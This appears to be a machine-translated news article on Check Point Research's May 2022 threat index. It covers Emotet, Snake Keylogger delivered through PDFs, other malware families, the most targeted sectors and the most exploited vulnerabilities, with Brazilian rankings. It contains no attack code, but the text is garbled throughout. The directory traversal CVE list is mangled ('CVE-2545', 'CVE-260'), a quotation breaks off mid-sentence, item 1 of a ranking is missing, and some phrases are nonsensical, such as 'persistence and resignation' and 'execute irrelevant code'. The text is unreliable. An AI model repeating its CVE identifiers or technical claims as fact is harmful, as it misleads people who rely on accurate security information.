Malware distributed via email with a PDF file attached

Check Point Research (CPR), the intelligence intelligence arm of Check Point Software Technologies Ltd. (NASDAQ: CHKP), a global provider of cyber security solutions, released its Global Threat Index for May 2022. Researchers report that Emotet, an advanced, self-propelled, modular Trojan that uses multiple methods to protect persistence and resignation. techniques to avoid censorship, are still the most widespread around the world and in Brazil as a result of widespread campaigns. Also, in May, Snake Keylogger malware jumped to eighth place after not being long in the index; Its main function is to record the keystrokes written by the user and transmit the collected data to the attackers.

Snake Keylogger is usually distributed via emails that contain attachments with docx or xlsx extensions with malicious macros. However, in May, CPR researchers reported that Snake Keylogger was spread via PDF file. This may be due to Microsoft’s blocking of common Internet macros in Office, which means that cybercriminals had to be more proactive, searching for new types of files such as PDFs. This rare method of distributing malware has been found to be effective because some know that PDF files are more secure than other types of files.

As for Emotet, this malware affects 8% of organizations worldwide, a small increase since April. Emotet is an active malware that proves to be useful because of its ability to remain undetected. Persistence also makes it harder to remove when a device is infected, making it the perfect tool for online weapons. Originally a bank Trojan, often distributed via phishing emails and having the ability to transmit other malware, increasing its chances of causing widespread damage.

“As the latest Snake Keylogger campaign shows, everything we post on the Internet is at risk of being hit by a cyberattack, and opening PDF files is a no-brainer. Viruses and malicious executables can hide inside multimedia content and links to malware attacks, in this case. Snake Keylogger, which is ready to attack as soon as a user opens a PDF file, “said Maya Horowitz, vice president of research at Check Point Software Technologies.

“So, just as we would question the legitimacy of docx or xlsx files in email attachments, we should be equally vigilant about PDFs. In today’s world, it doesn’t matter much. the organization has a strong email security solution. ” -mails that are dedicated and monitor attachments, preventing malicious files from entering the network in the first place, ”Maya said.

Possible list of areas and vulnerabilities

CPR also announced that in May, education and research continued to rank first on the list of the world’s most attacked areas by cybercriminals. “Web Servers Malicious URL Directory Traversal” is the top vulnerability, affecting 46% of global organizations, followed by “Apache Log4j Remote Code Execution” with a global impact equal to 46% . “Web Server Exposed Git Repository Information Disclosure” is the vulnerability that ranks third in the index that affects an average of 45%.

Large Malware family

* The arrow indicates the change in the number compared to the previous month.

In May, Emotet was the most popular malware, affecting 8% of organizations worldwide, followed by Formbook which affected 2% of organizations and AgentTesla had an impact on ‘ also 2%, in second and third place.

? Emotet – An advanced, self -propelled and modular Trojan. Emotet is an old banking trojan and has recently been used as a distributor of other malware or malicious propaganda. It uses a variety of methods to maintain persistence and escape techniques to avoid scrutiny. Also, it can be spread through phishing spam emails containing malicious links or links.

? Formbook-InfoStealer is targeted at Windows operating systems and first appeared in 2016. It is sold as Malware-as-a-Service (MaaS) on illegal hacking platforms due to its powerful evasion techniques and relatively low prices. FormBook collects permissions from various web browsers, captures, monitors and stores keystrokes, and can download and execute files according to C&C (Command & Control) commands.

? AgentTesla-This is an advanced RAT (Remote Access Trojan) that acts as a keylogger and information thief, able to monitor and collect access to the victim’s keyboard, system keyboard, screenshot and license filtering for various software installed on the victim’s machine (including Google Chrome, Mozilla Firefox and Microsoft Outlook email client).

For the sectors, in May, education and research continued to be the most attacked sector in the world, followed by Government/Military and Internet Service Providers & Managed Service Providers (ISPs/MSPs), respectively. in March and April.


2. Government/Military

3.Internet Service Providers (ISP)/Managed Service Providers (MSP)

In Brazil, the three most targeted areas in the national rankings in May were:

1.System Integrator/VAR/Distributor

2. Sales / Marketing

3. Government/Military

The education/research sector is ranked sixth nationally.

The highest vulnerabilities were exploited

In May, the CPR team also announced that “Web Servers Malicious URL Directory Traversal” was the most common vulnerability, affecting 46% of organizations worldwide, along with “Apache Log4j Remote Code Execution is “sticky” and second only with a global impact of 46%. The “Web Server Exposed Git Repository Information Disclosure” ranks third on the list of highly exploited vulnerabilities with an impact of 45%.

? Web Servers Destroy directory URLs (CVE-2010-4598, CVE-2011-2474, CVE-2014-0130, CVE-2014-0780, CVE-2015-0666, CVE-2015-4068, CVE-2545, CVE-2015 -2016-4523, CVE-2016-8530, CVE-2017-11512, CVE-2018-3948, CVE-2018-3949, CVE-2019-18952, CVE-2020-5410, CVE-260) vulnerability amin ‘of one directory on different web servers. The vulnerability is due to an access authentication error on a web server that does not properly clean the Uniform Resource Identifier (URI) for the directory system. Effective exploits allow an unauthenticated remote attacker to report or access unsolicited files on a vulnerable server.

? Apache Log4j Remote Code Execution (CVE-2021-44228)-There is a vulnerability for remote code execution in Apache Log4j. Effective exploitation of this vulnerability could allow a remote attacker to execute irrelevant code on the affected system.

? Web Server Exposed Git Repository Information Disclosure – An information vulnerability has been reported in the Git Repository. Effective exploitation of this vulnerability may allow the inadvertent disclosure of account information.

Top mobile malware

In May, mobile malware stayed in the same position as the April index: AlienBot was the most used mobile malware, followed by FluBot and xHelper.

1.AlienBot-The AlienBot family of malware is Malware-as-a-Service (MaaS) for Android devices that allows remote attackers, as a first step, to insert malicious code into legitimate financial software. The attacker gains access to the victims ’accounts and ultimately takes full control of the device.

2.FluBot – It is an Android botnet malware distributed via phishing SMS messages, most of which mimic delivery marks and software. As soon as the user clicks on the link inserted in the message, FluBot is installed and gets access to all the sensitive information on the phone.

3.xHelper – A malicious Android application, flagged since March 2019, used to download other malicious software and display ads. The application can hide itself from the user and re -install itself if removed.

The biggest malware of May in Brazil

The biggest malware in Brazil in May was Emotet again, returning the lead with a 23.55% impact for the organization. Chaes dropped to second place (6.88%) in the national rankings; this malware attacks most e-commerce platforms in Latin America and is responsible for campaigns designed to steal information from customers in the Mercado Livre and Mercado Pago, among others. PseudoManuscrypt malware ranked third (3.75%), a spy used in espionage campaigns that most seriously threatens government organizations and industrial surveillance systems. This spyware has advanced spying features including screenshots of victims and collecting VPN authentication credentials.

Check Point’s Global Threat Impact Index and its ThreatCloud image are powered by Check Point’s ThreatCloud intelligence, a collaborative network that provides real-time threat intelligence from its sensors. -hundreds of millions worldwide, across networks, endpoints and mobile devices. The intelligence is rich with AI-powered engines and unique search data from the Check Point Research (CPR) division.

Leave a Comment

Your email address will not be published.